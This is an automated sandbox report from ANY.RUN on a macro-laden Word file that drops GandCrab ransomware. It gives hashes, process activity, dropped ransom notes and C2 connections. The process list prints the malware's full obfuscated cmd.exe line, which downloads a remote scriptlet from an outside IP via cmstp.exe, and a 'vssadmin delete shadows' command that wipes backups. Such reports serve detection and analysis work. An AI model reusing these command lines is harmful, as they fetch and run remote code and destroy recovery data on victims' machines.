analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

eFax_Dokument.doc

Full analysis: https://app.any.run/tasks/12503c8b-6d86-46ed-92f5-e9348c58c5e5
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: March 21, 2019, 19:55:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
squiblydoo
ransomware
gandcrab
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Thu Mar 21 14:35:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

B6A6641BAF74CFDC80F28F7EC2B56347

SHA1:

AEA672AF6D6E1CDB20F1C7B281D53DB506200559

SHA256:

7E2D088E4950E867E875C547206795683070FA25E8C90AD301D3763B02A252A2

SSDEEP:

1536:3mMGHuJHHAShblIvD8P1aMxLm/4KnG0zFCFjkT2PXMdo0ZXEFN3FTHHG2bRBjD+w:3mmgKbS+1aMxLm/4KnqFNXM8VTHm2b/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • SQUIBLYDOO was detected

      • cmstp.exe (PID: 2436)
    • Application was dropped or rewritten from another process

      • 29132.exe (PID: 1156)
    • Writes file to Word startup folder

      • 29132.exe (PID: 1156)
    • Actions looks like stealing of personal data

      • 29132.exe (PID: 1156)
    • Dropped file may contain instructions of ransomware

      • 29132.exe (PID: 1156)
    • Renames files like Ransomware

      • 29132.exe (PID: 1156)
    • Deletes shadow copies

      • cmd.exe (PID: 3060)
    • Changes settings of System certificates

      • 29132.exe (PID: 1156)
    • Connects to CnC server

      • 29132.exe (PID: 1156)
    • GANDCRAB detected

      • 29132.exe (PID: 1156)
  • SUSPICIOUS

    • Creates files in the user directory

      • cmd.exe (PID: 2600)
      • cmstp.exe (PID: 2436)
      • 29132.exe (PID: 1156)
    • Executable content was dropped or overwritten

      • cmstp.exe (PID: 2436)
    • Creates files in the program directory

      • 29132.exe (PID: 1156)
    • Reads the cookies of Mozilla Firefox

      • 29132.exe (PID: 1156)
    • Starts CMD.EXE for commands execution

      • 29132.exe (PID: 1156)
    • Reads Internet Cache Settings

      • 29132.exe (PID: 1156)
    • Adds / modifies Windows certificates

      • 29132.exe (PID: 1156)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1848)
      • WINWORD.EXE (PID: 2880)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1848)
      • WINWORD.EXE (PID: 2880)
    • Dropped object may contain Bitcoin addresses

      • 29132.exe (PID: 1156)
    • Dropped object may contain TOR URL's

      • 29132.exe (PID: 1156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Admin
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Admin
RevisionNumber: 3
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2019:02:28 14:52:00
ModifyDate: 2019:03:21 14:35:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company:
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
10
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs #SQUIBLYDOO cmstp.exe #GANDCRAB 29132.exe winword.exe no specs cmd.exe vssadmin.exe no specs vssvc.exe no specs explorer.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1848"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\eFax_Dokument.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2600cmd /V /C set "I8=s" && !I8!et "I53=\" && !I8!et "I2=e" && !I8!et "I5=i" && !I8!et "I96=A" && !I8!et "I6=N" && !I8!et "I89=d" && c!I96!ll !I8!et "I0=%!I96!PP!I89!!I96!T!I96!%" && c!I96!ll !I8!et "I31=%R!I96!!I6!!I89!OM%" && !I8!et "I81=!I0!!I53!M!I5!cro!I8!oft!I53!T!I2!mplat!I2!s!I53!!I31!.txt" && !I8!et "I07="^" && (For %i in ("[v!I2!r!I8!ion]" "!I8!ignatur!I2!=$Wi!I6!dow!I8! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!I2!faultIn!I8!tall_Singl!I2!U!I8!er]" "UnR!I2!gi!I8!t!I2!rOCXs=I97" "[I97]" "%11%\%I7_1%%I7_2%%I7_3%,NI,%I_1%%I_2%%I_3%%I_4%%I_5%%I_6%%I_7%%I_8%%I_9%%I_10%%I_11%%I_12%%I_13%%I_14%" "[!I8!tring!I8!]" "I_1=ht" "I_2=tp" "I_3=:/" "I_4=/1" "I_5=34" "I_6=.2" "I_7=09" "I_8=.8" "I_9=8." "I_10=23" "I_11=/a" "I_12=sd" "I_13=.t" "I_14=xt" "I7_2=rO" "I7_1=sC" "I7_3=bJ" ) do @echo %~i)>"!I81!" && echo !I8!erv!I5!ceNam!I2!=!I07! !I07!>>!I81! && echo !I8!hortSvcN!I96!me=!I07! !I07!>>!I81! && c!I96!ll !I8!et "I28=%WI!I6!!I89!IR%" && !I8!t!I96!rt "" !I28!!I53!Sy!I8!t!I2!m32!I53!cm!I8!tp.!I2!x!I2! /s /ns "!I81!"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2436C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\31224.txt"C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
1156"C:\Users\admin\AppData\Roaming\Microsoft\29132.exe" C:\Users\admin\AppData\Roaming\Microsoft\29132.exe
cmstp.exe
User:
admin
Integrity Level:
MEDIUM
2880"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\sometimesc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3060"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quietC:\Windows\system32\cmd.exe
29132.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
972vssadmin delete shadows /all /quietC:\Windows\system32\vssadmin.execmd.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2932C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2540"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3508"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Documents\GQREO-MANUAL.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 113
Read events
1 965
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
422
Text files
326
Unknown types
18

Dropped files

PID
Process
Filename
Type
1848WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8A55.tmp.cvr
MD5:
SHA256:
1848WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF1F782E4B74448257.TMP
MD5:
SHA256:
2436cmstp.exeC:\Users\admin\AppData\Roaming\Microsoft\29132.exeexecutable
MD5:5DC82CAF1BED2BF1F465F12869777BBA
SHA256:8A79211CB83014CDCF644B2105366BC1CA52A2414C93396EDEB531194026C3D8
115629132.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\GQREO-MANUAL.txttext
MD5:E8CD0E20E385BD0653D62967814EAC2C
SHA256:0CC05663FBB9D5E62BC5D58D2BCEEED92E99E3E63BD1A80BC0E29BA42D984462
115629132.exeC:\MSOCache\GQREO-MANUAL.txttext
MD5:E8CD0E20E385BD0653D62967814EAC2C
SHA256:0CC05663FBB9D5E62BC5D58D2BCEEED92E99E3E63BD1A80BC0E29BA42D984462
115629132.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\GQREO-MANUAL.txttext
MD5:E8CD0E20E385BD0653D62967814EAC2C
SHA256:0CC05663FBB9D5E62BC5D58D2BCEEED92E99E3E63BD1A80BC0E29BA42D984462
115629132.exeC:\$Recycle.Bin\GQREO-MANUAL.txttext
MD5:E8CD0E20E385BD0653D62967814EAC2C
SHA256:0CC05663FBB9D5E62BC5D58D2BCEEED92E99E3E63BD1A80BC0E29BA42D984462
1848WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C2F8C21CBDD63CE007BEFAADFCC707EC
SHA256:D445B9DC038B003F0B915D62C39A6FA1A7BAD3834D8ECA1FCEBD70CCDAFC4AF2
115629132.exeC:\Program Files\GQREO-MANUAL.txttext
MD5:E8CD0E20E385BD0653D62967814EAC2C
SHA256:0CC05663FBB9D5E62BC5D58D2BCEEED92E99E3E63BD1A80BC0E29BA42D984462
115629132.exeC:\GQREO-MANUAL.txttext
MD5:E8CD0E20E385BD0653D62967814EAC2C
SHA256:0CC05663FBB9D5E62BC5D58D2BCEEED92E99E3E63BD1A80BC0E29BA42D984462
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2436
cmstp.exe
GET
200
134.209.88.23:80
http://134.209.88.23/asd.txt
US
xml
280 Kb
malicious
1156
29132.exe
GET
301
107.173.49.208:80
http://www.kakaocorp.link/
US
html
162 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1156
29132.exe
107.173.49.208:80
www.kakaocorp.link
ColoCrossing
US
malicious
1156
29132.exe
107.173.49.208:443
www.kakaocorp.link
ColoCrossing
US
malicious
2436
cmstp.exe
134.209.88.23:80
US
malicious

DNS requests

Domain
IP
Reputation
www.kakaocorp.link
  • 107.173.49.208
malicious

Threats

PID
Process
Class
Message
2436
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
2436
cmstp.exe
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
1156
29132.exe
A Network Trojan was detected
MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
1156
29132.exe
A Network Trojan was detected
MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
1156
29132.exe
A Network Trojan was detected
MALWARE [PTsecurity] GandCrab v.5 SSL Connection
4 ETPRO signatures available at the full report
No debug info